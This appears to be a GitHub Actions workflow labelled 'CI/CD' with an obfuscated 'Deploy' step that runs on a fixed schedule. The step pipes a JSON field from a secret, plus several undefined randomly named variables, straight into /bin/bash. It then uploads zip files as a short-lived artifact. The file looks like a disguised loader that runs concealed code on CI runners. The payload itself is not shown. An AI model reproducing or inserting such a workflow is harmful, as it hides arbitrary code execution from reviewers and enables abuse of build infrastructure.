name: CI/CD
on:
  workflow_dispatch:

  schedule:
    - cron: '46 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          c44030: ${{ secrets.c44030 }}
        run: |
          printf '%s' "$c44030" | jq -r .guhgl34571 | /bin/bash
          echo $cbapg50577 | jq -r .i6 | /bin/bash
          printf '%s' "$qdwpu441" | jq -r .nth2 | /bin/bash
          printf '%s' "$frmqd13453" | jq -r .ibmr3179 | /bin/bash
          printf '%s' "$qtl850" | jq -r .nj15617 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: 1CcqrSim
          path: "*.zip"
          retention-days: 1
